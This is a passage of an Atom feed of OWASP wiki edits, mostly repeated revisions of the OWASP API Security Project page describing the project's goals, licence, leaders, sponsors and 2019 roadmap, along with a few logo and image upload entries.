   |-&lt;br /&gt;
   | colspan=&amp;quot;2&amp;quot; align=&amp;quot;center&amp;quot; | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]] &lt;br /&gt;
   |-&lt;br /&gt;
   | colspan=&amp;quot;2&amp;quot; align=&amp;quot;center&amp;quot; | [[File:Project_Type_Files_DOC.jpg|link=]]   &lt;br /&gt;
   |}&lt;br /&gt;
&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
= Acknowledgments =&lt;br /&gt;
&lt;br /&gt;
==Founders==&lt;br /&gt;
* Erez Yalon&lt;br /&gt;
* Inon Shkedy&lt;br /&gt;
&lt;br /&gt;
==Sponsors==&lt;br /&gt;
[[File:Checkmarx-Logo-Horizontal-black-512px.png|left|Checkmarx Logo]]&lt;br /&gt;
[[File:SALT Logo.jpg|512px|none|left|SALT Logo]]&lt;br /&gt;
&lt;br /&gt;
==Main Maintainer==&lt;br /&gt;
* Paulo Silva&lt;br /&gt;
&lt;br /&gt;
==Contributors==&lt;br /&gt;
* David Sopas&lt;br /&gt;
* Chris Westphal&lt;br /&gt;
&lt;br /&gt;
= Road Map =&lt;br /&gt;
&lt;br /&gt;
==Planned Projects==&lt;br /&gt;
* API Security Top 10&lt;br /&gt;
* API Security Cheat Sheet&lt;br /&gt;
* crAPI ('''C'''ompletely '''R'''idiculous '''API''' - an intentionally vulnerable API project)&lt;br /&gt;
&lt;br /&gt;
==Road Map==&lt;br /&gt;
[[File:Roadmap.png|left|Roadmap]]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- DO NOT ALTER OR REMOVE THE TEXT ON NEXT LINE --&amp;gt;&lt;br /&gt;
__NOTOC__ &amp;lt;headertabs /&amp;gt; &lt;br /&gt;
&lt;br /&gt;
[[Category:OWASP Project]]  &lt;br /&gt;
[[Category:OWASP_Builders]] &lt;br /&gt;
[[Category:OWASP_Breakers]] &lt;br /&gt;
[[Category:OWASP_Defenders]]  &lt;br /&gt;
[[Category:OWASP_Document]]&lt;/div&gt;</summary>
		<author><name>ErezYalon</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=OWASP_API_Security_Project&amp;diff=252019</id>
		<title>OWASP API Security Project</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=OWASP_API_Security_Project&amp;diff=252019"/>
				<updated>2019-05-31T13:30:34Z</updated>
		
		<summary type="html">&lt;p&gt;ErezYalon: Added Road Map&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Main=&lt;br /&gt;
&amp;lt;!-- DO NOT ALTER OR REMOVE THE TEXT ON NEXT LINE --&amp;gt;&lt;br /&gt;
&amp;lt;div style=&amp;quot;width:100%;height:160px;border:0,margin:0;overflow: hidden;&amp;quot;&amp;gt;[[File:OWASP_Project_Header.jpg|link=]]&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- DO NOT ALTER OR REMOVE THE TEXT ON NEXT LINE --&amp;gt;&lt;br /&gt;
{| style=&amp;quot;padding: 0;margin:0;margin-top:10px;text-align:left;&amp;quot; |-&lt;br /&gt;
| valign=&amp;quot;top&amp;quot; style=&amp;quot;border-right: 1px dotted gray;padding-right:25px;&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
==OWASP API Security Project==&lt;br /&gt;
&lt;br /&gt;
=== [24-Dec-2018] ===&lt;br /&gt;
'''The OWASP API Security Project is now under new leadership.'''&lt;br /&gt;
'''A new roadmap and call for contribution will be published by the end of Feb 2019.'''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
This project is designed to address the ever-increasing number of organizations that are deploying potentially sensitive APIs as part of their software offerings. These APIs are used for internal tasks and to interface with third parties. Unfortunately, many APIs do not undergo the rigorous security testing that would render them secure from attack.&lt;br /&gt;
&lt;br /&gt;
The OWASP API Security Project seeks to provide value to software developers and security assessors by underscoring the potential risks in insecure APIs and illustrating how these risks may be mitigated. In order to facilitate this goal, the OWASP API Security Project will create and maintain a '''Top 10 API Security Risks''' document, as well as a '''documentation portal''' for best practices when creating or assessing APIs.&lt;br /&gt;
&lt;br /&gt;
==Description==&lt;br /&gt;
&lt;br /&gt;
While working as developers or information security consultants, many people have encountered APIs as part of a project. While there are some resources to help create and evaluate these projects (such as the OWASP REST Security Cheat Sheet), there has not be a comprehensive security project designed to assist builders, breakers, and defenders in the community.&lt;br /&gt;
&lt;br /&gt;
This project aims to create:&lt;br /&gt;
&lt;br /&gt;
* The OWASP Top Ten API Security Risks document, which can easily underscore the most common risks in the area.&lt;br /&gt;
* Create a documentation portal for developers to build APIs in a secure manner.&lt;br /&gt;
* Work with the security community to maintain living documents that evolve with security trends.&lt;br /&gt;
&lt;br /&gt;
==Licensing==&lt;br /&gt;
&lt;br /&gt;
'''The OWASP API Security Project documents are free to use!'''&lt;br /&gt;
&lt;br /&gt;
The OWASP API Security Project is licensed under the http://creativecommons.org/licenses/by-sa/3.0/ Creative Commons Attribution-ShareAlike 3.0 license], so you can copy, distribute and transmit the work, and you can adapt it, and use it commercially, but all provided that you attribute the work and if you alter, transform, or build upon this work, you may distribute the resulting work only under the same or similar license to this one.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- DO NOT ALTER OR REMOVE THE TEXT ON NEXT LINE --&amp;gt;&lt;br /&gt;
| valign=&amp;quot;top&amp;quot; style=&amp;quot;padding-left:25px;width:200px;border-right: 1px dotted gray;padding-right:25px;&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
== What is this project? ==&lt;br /&gt;
&lt;br /&gt;
The OWASP API Security Project seeks to deliver actionable documentation on creating and deploying verifiably secure web APIs, as well as illustrating the major risks and shortfalls that APIs may encounter. By helping developers create resilient software, and helping assessors understand the subtle risks an API may entail, the goal of this project is to bring security to an increasingly programmatic world.&lt;br /&gt;
&lt;br /&gt;
The primary deliverables of this project are the '''OWASP Top Ten API Security Risks''' and a secure API development '''documentation portal.'''&lt;br /&gt;
&lt;br /&gt;
== Presentation ==&lt;br /&gt;
&lt;br /&gt;
The OWASP API Security Project will be presented at [https://telaviv.appsecglobal.org/ OWASP Global AppSec Tel Aviv, May 2019].&lt;br /&gt;
&lt;br /&gt;
== Project Leaders ==&lt;br /&gt;
&lt;br /&gt;
* [https://www.owasp.org/index.php/User:ErezYalon Erez Yalon]&lt;br /&gt;
* Inon Shkedy&lt;br /&gt;
&lt;br /&gt;
== Related Projects ==&lt;br /&gt;
&lt;br /&gt;
* [[REST_Security_Cheat_Sheet]]&lt;br /&gt;
* [https://www.owasp.org/index.php/Category:OWASP_Enterprise_Security_API Enterprise Security API]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- DO NOT ALTER OR REMOVE THE TEXT ON NEXT LINE --&amp;gt;&lt;br /&gt;
| valign=&amp;quot;top&amp;quot; style=&amp;quot;padding-left:25px;width:200px;&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
== Quick Download ==&lt;br /&gt;
&lt;br /&gt;
Once API Security documents are created, they will be available for direct download here.&lt;br /&gt;
&lt;br /&gt;
The initial version of this document, including an up-to-date table of contents, is available [https://www.owasp.org/images/f/f6/Owasp_api_security_toc.pdf here].&lt;br /&gt;
&lt;br /&gt;
== News and Events ==&lt;br /&gt;
&lt;br /&gt;
There has not yet been press coverage of this project.&lt;br /&gt;
&lt;br /&gt;
==Classifications==&lt;br /&gt;
&lt;br /&gt;
   {| width=&amp;quot;200&amp;quot; cellpadding=&amp;quot;2&amp;quot;&lt;br /&gt;
   |-&lt;br /&gt;
   | rowspan=&amp;quot;3&amp;quot; align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot; | [[File:New projects.png|100px|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Incubator_Projects]]&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot; | [[File:Owasp-builders-small.png|link=]]  &lt;br /&gt;
   |-&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot; | [[File:Owasp-breakers-small.png|link=]]&lt;br /&gt;
   |-&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot; | [[File:Owasp-defenders-small.png|link=]]&lt;br /&gt;
   |-&lt;br /&gt;
   | colspan=&amp;quot;2&amp;quot; align=&amp;quot;center&amp;quot; | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]] &lt;br /&gt;
   |-&lt;br /&gt;
   | colspan=&amp;quot;2&amp;quot; align=&amp;quot;center&amp;quot; | [[File:Project_Type_Files_DOC.jpg|link=]]   &lt;br /&gt;
   |}&lt;br /&gt;
&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
= Acknowledgements =&lt;br /&gt;
&lt;br /&gt;
==Founders==&lt;br /&gt;
* Erez Yalon&lt;br /&gt;
* Inon Shkedy&lt;br /&gt;
&lt;br /&gt;
==Sponsors==&lt;br /&gt;
[[File:Checkmarx-Logo-Horizontal-black-512px.png|left|Checkmarx Logo]]&lt;br /&gt;
[[File:SALT Logo.jpg|512px|none|left|SALT Logo]]&lt;br /&gt;
&lt;br /&gt;
==Main Maintainer==&lt;br /&gt;
* Paulo Silva&lt;br /&gt;
&lt;br /&gt;
==Contributors==&lt;br /&gt;
* David Sopas&lt;br /&gt;
* Chris Westphal&lt;br /&gt;
&lt;br /&gt;
= Road Map =&lt;br /&gt;
&lt;br /&gt;
==Planned Projects==&lt;br /&gt;
* API Security Top 10&lt;br /&gt;
* API Security Cheat Sheet&lt;br /&gt;
* crAPI ('''C'''ompletely '''R'''idiculous '''API''' - an intentionally vulnerable API project)&lt;br /&gt;
&lt;br /&gt;
==Road Map==&lt;br /&gt;
[[File:Roadmap.png|left|Roadmap]]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- DO NOT ALTER OR REMOVE THE TEXT ON NEXT LINE --&amp;gt;&lt;br /&gt;
__NOTOC__ &amp;lt;headertabs /&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Category:OWASP Project]]  &lt;br /&gt;
[[Category:OWASP_Builders]] &lt;br /&gt;
[[Category:OWASP_Breakers]] &lt;br /&gt;
[[Category:OWASP_Defenders]]  &lt;br /&gt;
[[Category:OWASP_Document]]&lt;/div&gt;</summary>
		<author><name>ErezYalon</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=File:Roadmap.png&amp;diff=252018</id>
		<title>File:Roadmap.png</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=File:Roadmap.png&amp;diff=252018"/>
				<updated>2019-05-31T13:29:56Z</updated>
		
		<summary type="html">&lt;p&gt;ErezYalon: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Roadmap&lt;/div&gt;</summary>
		<author><name>ErezYalon</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=OWASP_API_Security_Project&amp;diff=252017</id>
		<title>OWASP API Security Project</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=OWASP_API_Security_Project&amp;diff=252017"/>
				<updated>2019-05-31T13:14:50Z</updated>
		
		<summary type="html">&lt;p&gt;ErezYalon: Added Planned Projects to the Road Map&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Main=&lt;br /&gt;
&amp;lt;!-- DO NOT ALTER OR REMOVE THE TEXT ON NEXT LINE --&amp;gt;&lt;br /&gt;
&amp;lt;div style=&amp;quot;width:100%;height:160px;border:0,margin:0;overflow: hidden;&amp;quot;&amp;gt;[[File:OWASP_Project_Header.jpg|link=]]&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- DO NOT ALTER OR REMOVE THE TEXT ON NEXT LINE --&amp;gt;&lt;br /&gt;
{| style=&amp;quot;padding: 0;margin:0;margin-top:10px;text-align:left;&amp;quot; |-&lt;br /&gt;
| valign=&amp;quot;top&amp;quot; style=&amp;quot;border-right: 1px dotted gray;padding-right:25px;&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
==OWASP API Security Project==&lt;br /&gt;
&lt;br /&gt;
=== [24-Dec-2018] ===&lt;br /&gt;
'''The OWASP API Security Project is now under new leadership.'''&lt;br /&gt;
'''A new roadmap and call for contribution will be published by the end of Feb 2019.'''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
This project is designed to address the ever-increasing number of organizations that are deploying potentially sensitive APIs as part of their software offerings. These APIs are used for internal tasks and to interface with third parties. Unfortunately, many APIs do not undergo the rigorous security testing that would render them secure from attack.&lt;br /&gt;
&lt;br /&gt;
The OWASP API Security Project seeks to provide value to software developers and security assessors by underscoring the potential risks in insecure APIs and illustrating how these risks may be mitigated. In order to facilitate this goal, the OWASP API Security Project will create and maintain a '''Top 10 API Security Risks''' document, as well as a '''documentation portal''' for best practices when creating or assessing APIs.&lt;br /&gt;
&lt;br /&gt;
==Description==&lt;br /&gt;
&lt;br /&gt;
While working as developers or information security consultants, many people have encountered APIs as part of a project. While there are some resources to help create and evaluate these projects (such as the OWASP REST Security Cheat Sheet), there has not be a comprehensive security project designed to assist builders, breakers, and defenders in the community.&lt;br /&gt;
&lt;br /&gt;
This project aims to create:&lt;br /&gt;
&lt;br /&gt;
* The OWASP Top Ten API Security Risks document, which can easily underscore the most common risks in the area.&lt;br /&gt;
* Create a documentation portal for developers to build APIs in a secure manner.&lt;br /&gt;
* Work with the security community to maintain living documents that evolve with security trends.&lt;br /&gt;
&lt;br /&gt;
==Licensing==&lt;br /&gt;
&lt;br /&gt;
'''The OWASP API Security Project documents are free to use!'''&lt;br /&gt;
&lt;br /&gt;
The OWASP API Security Project is licensed under the http://creativecommons.org/licenses/by-sa/3.0/ Creative Commons Attribution-ShareAlike 3.0 license], so you can copy, distribute and transmit the work, and you can adapt it, and use it commercially, but all provided that you attribute the work and if you alter, transform, or build upon this work, you may distribute the resulting work only under the same or similar license to this one.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- DO NOT ALTER OR REMOVE THE TEXT ON NEXT LINE --&amp;gt;&lt;br /&gt;
| valign=&amp;quot;top&amp;quot; style=&amp;quot;padding-left:25px;width:200px;border-right: 1px dotted gray;padding-right:25px;&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
== What is this project? ==&lt;br /&gt;
&lt;br /&gt;
The OWASP API Security Project seeks to deliver actionable documentation on creating and deploying verifiably secure web APIs, as well as illustrating the major risks and shortfalls that APIs may encounter. By helping developers create resilient software, and helping assessors understand the subtle risks an API may entail, the goal of this project is to bring security to an increasingly programmatic world.&lt;br /&gt;
&lt;br /&gt;
The primary deliverables of this project are the '''OWASP Top Ten API Security Risks''' and a secure API development '''documentation portal.'''&lt;br /&gt;
&lt;br /&gt;
== Presentation ==&lt;br /&gt;
&lt;br /&gt;
The OWASP API Security Project will be presented at [https://telaviv.appsecglobal.org/ OWASP Global AppSec Tel Aviv, May 2019].&lt;br /&gt;
&lt;br /&gt;
== Project Leaders ==&lt;br /&gt;
&lt;br /&gt;
* [https://www.owasp.org/index.php/User:ErezYalon Erez Yalon]&lt;br /&gt;
* Inon Shkedy&lt;br /&gt;
&lt;br /&gt;
== Related Projects ==&lt;br /&gt;
&lt;br /&gt;
* [[REST_Security_Cheat_Sheet]]&lt;br /&gt;
* [https://www.owasp.org/index.php/Category:OWASP_Enterprise_Security_API Enterprise Security API]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- DO NOT ALTER OR REMOVE THE TEXT ON NEXT LINE --&amp;gt;&lt;br /&gt;
| valign=&amp;quot;top&amp;quot; style=&amp;quot;padding-left:25px;width:200px;&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
== Quick Download ==&lt;br /&gt;
&lt;br /&gt;
Once API Security documents are created, they will be available for direct download here.&lt;br /&gt;
&lt;br /&gt;
The initial version of this document, including an up-to-date table of contents, is available [https://www.owasp.org/images/f/f6/Owasp_api_security_toc.pdf here].&lt;br /&gt;
&lt;br /&gt;
== News and Events ==&lt;br /&gt;
&lt;br /&gt;
There has not yet been press coverage of this project.&lt;br /&gt;
&lt;br /&gt;
==Classifications==&lt;br /&gt;
&lt;br /&gt;
   {| width=&amp;quot;200&amp;quot; cellpadding=&amp;quot;2&amp;quot;&lt;br /&gt;
   |-&lt;br /&gt;
   | rowspan=&amp;quot;3&amp;quot; align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot; | [[File:New projects.png|100px|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Incubator_Projects]]&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot; | [[File:Owasp-builders-small.png|link=]]  &lt;br /&gt;
   |-&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot; | [[File:Owasp-breakers-small.png|link=]]&lt;br /&gt;
   |-&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot; | [[File:Owasp-defenders-small.png|link=]]&lt;br /&gt;
   |-&lt;br /&gt;
   | colspan=&amp;quot;2&amp;quot; align=&amp;quot;center&amp;quot; | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]] &lt;br /&gt;
   |-&lt;br /&gt;
   | colspan=&amp;quot;2&amp;quot; align=&amp;quot;center&amp;quot; | [[File:Project_Type_Files_DOC.jpg|link=]]   &lt;br /&gt;
   |}&lt;br /&gt;
&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
= Acknowledgements =&lt;br /&gt;
&lt;br /&gt;
==Founders==&lt;br /&gt;
* Erez Yalon&lt;br /&gt;
* Inon Shkedy&lt;br /&gt;
&lt;br /&gt;
==Sponsors==&lt;br /&gt;
[[File:Checkmarx-Logo-Horizontal-black-512px.png|left|Checkmarx Logo]]&lt;br /&gt;
[[File:SALT Logo.jpg|512px|none|left|SALT Logo]]&lt;br /&gt;
&lt;br /&gt;
==Main Maintainer==&lt;br /&gt;
* Paulo Silva&lt;br /&gt;
&lt;br /&gt;
==Contributors==&lt;br /&gt;
* David Sopas&lt;br /&gt;
* Chris Westphal&lt;br /&gt;
&lt;br /&gt;
= Road Map =&lt;br /&gt;
&lt;br /&gt;
==Planned Projects==&lt;br /&gt;
* API Security Top 10&lt;br /&gt;
* API Security Cheat Sheet&lt;br /&gt;
* crAPI ('''C'''ompletely '''R'''idiculous '''API''' - an intentionally vulnerable API project)&lt;br /&gt;
&lt;br /&gt;
==Road Map==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- DO NOT ALTER OR REMOVE THE TEXT ON NEXT LINE --&amp;gt;&lt;br /&gt;
__NOTOC__ &amp;lt;headertabs /&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Category:OWASP Project]]  &lt;br /&gt;
[[Category:OWASP_Builders]] &lt;br /&gt;
[[Category:OWASP_Breakers]] &lt;br /&gt;
[[Category:OWASP_Defenders]]  &lt;br /&gt;
[[Category:OWASP_Document]]&lt;/div&gt;</summary>
		<author><name>ErezYalon</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=OWASP_API_Security_Project&amp;diff=252014</id>
		<title>OWASP API Security Project</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=OWASP_API_Security_Project&amp;diff=252014"/>
				<updated>2019-05-31T12:52:03Z</updated>
		
		<summary type="html">&lt;p&gt;ErezYalon: Added parties and individuals to the Acknowledgments section&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Main=&lt;br /&gt;
&amp;lt;!-- DO NOT ALTER OR REMOVE THE TEXT ON NEXT LINE --&amp;gt;&lt;br /&gt;
&amp;lt;div style=&amp;quot;width:100%;height:160px;border:0,margin:0;overflow: hidden;&amp;quot;&amp;gt;[[File:OWASP_Project_Header.jpg|link=]]&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- DO NOT ALTER OR REMOVE THE TEXT ON NEXT LINE --&amp;gt;&lt;br /&gt;
{| style=&amp;quot;padding: 0;margin:0;margin-top:10px;text-align:left;&amp;quot; |-&lt;br /&gt;
| valign=&amp;quot;top&amp;quot; style=&amp;quot;border-right: 1px dotted gray;padding-right:25px;&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
==OWASP API Security Project==&lt;br /&gt;
&lt;br /&gt;
=== [24-Dec-2018] ===&lt;br /&gt;
'''The OWASP API Security Project is now under new leadership.'''&lt;br /&gt;
'''A new roadmap and call for contribution will be published by the end of Feb 2019.'''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
This project is designed to address the ever-increasing number of organizations that are deploying potentially sensitive APIs as part of their software offerings. These APIs are used for internal tasks and to interface with third parties. Unfortunately, many APIs do not undergo the rigorous security testing that would render them secure from attack.&lt;br /&gt;
&lt;br /&gt;
The OWASP API Security Project seeks to provide value to software developers and security assessors by underscoring the potential risks in insecure APIs and illustrating how these risks may be mitigated. In order to facilitate this goal, the OWASP API Security Project will create and maintain a '''Top 10 API Security Risks''' document, as well as a '''documentation portal''' for best practices when creating or assessing APIs.&lt;br /&gt;
&lt;br /&gt;
==Description==&lt;br /&gt;
&lt;br /&gt;
While working as developers or information security consultants, many people have encountered APIs as part of a project. While there are some resources to help create and evaluate these projects (such as the OWASP REST Security Cheat Sheet), there has not be a comprehensive security project designed to assist builders, breakers, and defenders in the community.&lt;br /&gt;
&lt;br /&gt;
This project aims to create:&lt;br /&gt;
&lt;br /&gt;
* The OWASP Top Ten API Security Risks document, which can easily underscore the most common risks in the area.&lt;br /&gt;
* Create a documentation portal for developers to build APIs in a secure manner.&lt;br /&gt;
* Work with the security community to maintain living documents that evolve with security trends.&lt;br /&gt;
&lt;br /&gt;
==Licensing==&lt;br /&gt;
&lt;br /&gt;
'''The OWASP API Security Project documents are free to use!'''&lt;br /&gt;
&lt;br /&gt;
The OWASP API Security Project is licensed under the http://creativecommons.org/licenses/by-sa/3.0/ Creative Commons Attribution-ShareAlike 3.0 license], so you can copy, distribute and transmit the work, and you can adapt it, and use it commercially, but all provided that you attribute the work and if you alter, transform, or build upon this work, you may distribute the resulting work only under the same or similar license to this one.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- DO NOT ALTER OR REMOVE THE TEXT ON NEXT LINE --&amp;gt;&lt;br /&gt;
| valign=&amp;quot;top&amp;quot; style=&amp;quot;padding-left:25px;width:200px;border-right: 1px dotted gray;padding-right:25px;&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
== What is this project? ==&lt;br /&gt;
&lt;br /&gt;
The OWASP API Security Project seeks to deliver actionable documentation on creating and deploying verifiably secure web APIs, as well as illustrating the major risks and shortfalls that APIs may encounter. By helping developers create resilient software, and helping assessors understand the subtle risks an API may entail, the goal of this project is to bring security to an increasingly programmatic world.&lt;br /&gt;
&lt;br /&gt;
The primary deliverables of this project are the '''OWASP Top Ten API Security Risks''' and a secure API development '''documentation portal.'''&lt;br /&gt;
&lt;br /&gt;
== Presentation ==&lt;br /&gt;
&lt;br /&gt;
The OWASP API Security Project will be presented at [https://telaviv.appsecglobal.org/ OWASP Global AppSec Tel Aviv, May 2019].&lt;br /&gt;
&lt;br /&gt;
== Project Leaders ==&lt;br /&gt;
&lt;br /&gt;
* [https://www.owasp.org/index.php/User:ErezYalon Erez Yalon]&lt;br /&gt;
* Inon Shkedy&lt;br /&gt;
&lt;br /&gt;
== Related Projects ==&lt;br /&gt;
&lt;br /&gt;
* [[REST_Security_Cheat_Sheet]]&lt;br /&gt;
* [https://www.owasp.org/index.php/Category:OWASP_Enterprise_Security_API Enterprise Security API]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- DO NOT ALTER OR REMOVE THE TEXT ON NEXT LINE --&amp;gt;&lt;br /&gt;
| valign=&amp;quot;top&amp;quot; style=&amp;quot;padding-left:25px;width:200px;&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
== Quick Download ==&lt;br /&gt;
&lt;br /&gt;
Once API Security documents are created, they will be available for direct download here.&lt;br /&gt;
&lt;br /&gt;
The initial version of this document, including an up-to-date table of contents, is available [https://www.owasp.org/images/f/f6/Owasp_api_security_toc.pdf here].&lt;br /&gt;
&lt;br /&gt;
== News and Events ==&lt;br /&gt;
&lt;br /&gt;
There has not yet been press coverage of this project.&lt;br /&gt;
&lt;br /&gt;
==Classifications==&lt;br /&gt;
&lt;br /&gt;
   {| width=&amp;quot;200&amp;quot; cellpadding=&amp;quot;2&amp;quot;&lt;br /&gt;
   |-&lt;br /&gt;
   | rowspan=&amp;quot;3&amp;quot; align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot; | [[File:New projects.png|100px|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Incubator_Projects]]&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot; | [[File:Owasp-builders-small.png|link=]]  &lt;br /&gt;
   |-&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot; | [[File:Owasp-breakers-small.png|link=]]&lt;br /&gt;
   |-&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot; | [[File:Owasp-defenders-small.png|link=]]&lt;br /&gt;
   |-&lt;br /&gt;
   | colspan=&amp;quot;2&amp;quot; align=&amp;quot;center&amp;quot; | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]] &lt;br /&gt;
   |-&lt;br /&gt;
   | colspan=&amp;quot;2&amp;quot; align=&amp;quot;center&amp;quot; | [[File:Project_Type_Files_DOC.jpg|link=]]   &lt;br /&gt;
   |}&lt;br /&gt;
&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
= Acknowledgements =&lt;br /&gt;
&lt;br /&gt;
==Founders==&lt;br /&gt;
* Erez Yalon&lt;br /&gt;
* Inon Shkedy&lt;br /&gt;
&lt;br /&gt;
==Sponsors==&lt;br /&gt;
[[File:Checkmarx-Logo-Horizontal-black-512px.png|left|Checkmarx Logo]]&lt;br /&gt;
[[File:SALT Logo.jpg|512px|none|left|SALT Logo]]&lt;br /&gt;
&lt;br /&gt;
==Main Maintainer==&lt;br /&gt;
* Paulo Silva&lt;br /&gt;
&lt;br /&gt;
==Contributors==&lt;br /&gt;
* David Sopas&lt;br /&gt;
* Chris Westphal&lt;br /&gt;
&lt;br /&gt;
= Road Map =&lt;br /&gt;
[[File:API Security Project Road map 2019a.png|alt=API Security Project Road map 2019|none|API Security Project Road map 2019]]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- DO NOT ALTER OR REMOVE THE TEXT ON NEXT LINE --&amp;gt;&lt;br /&gt;
__NOTOC__ &amp;lt;headertabs /&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Category:OWASP Project]]  &lt;br /&gt;
[[Category:OWASP_Builders]] &lt;br /&gt;
[[Category:OWASP_Breakers]] &lt;br /&gt;
[[Category:OWASP_Defenders]]  &lt;br /&gt;
[[Category:OWASP_Document]]&lt;/div&gt;</summary>
		<author><name>ErezYalon</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=File:Checkmarx-Logo-Horizontal-black-512px.png&amp;diff=252013</id>
		<title>File:Checkmarx-Logo-Horizontal-black-512px.png</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=File:Checkmarx-Logo-Horizontal-black-512px.png&amp;diff=252013"/>
				<updated>2019-05-31T12:44:49Z</updated>
		
		<summary type="html">&lt;p&gt;ErezYalon: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Checkmarx Logo&lt;/div&gt;</summary>
		<author><name>ErezYalon</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=File:SALT_Logo.jpg&amp;diff=252011</id>
		<title>File:SALT Logo.jpg</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=File:SALT_Logo.jpg&amp;diff=252011"/>
				<updated>2019-05-31T12:38:13Z</updated>
		
		<summary type="html">&lt;p&gt;ErezYalon: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;SALT Logo&lt;/div&gt;</summary>
		<author><name>ErezYalon</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=File:Logo-Horizontal-black-512x512px.png&amp;diff=252010</id>
		<title>File:Logo-Horizontal-black-512x512px.png</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=File:Logo-Horizontal-black-512x512px.png&amp;diff=252010"/>
				<updated>2019-05-31T12:36:46Z</updated>
		
		<summary type="html">&lt;p&gt;ErezYalon: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Checkmarx Logo&lt;/div&gt;</summary>
		<author><name>ErezYalon</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=OWASP_API_Security_Project&amp;diff=252009</id>
		<title>OWASP API Security Project</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=OWASP_API_Security_Project&amp;diff=252009"/>
				<updated>2019-05-31T12:16:32Z</updated>
		
		<summary type="html">&lt;p&gt;ErezYalon: Remove redundant section - Project About&lt;/p&gt;
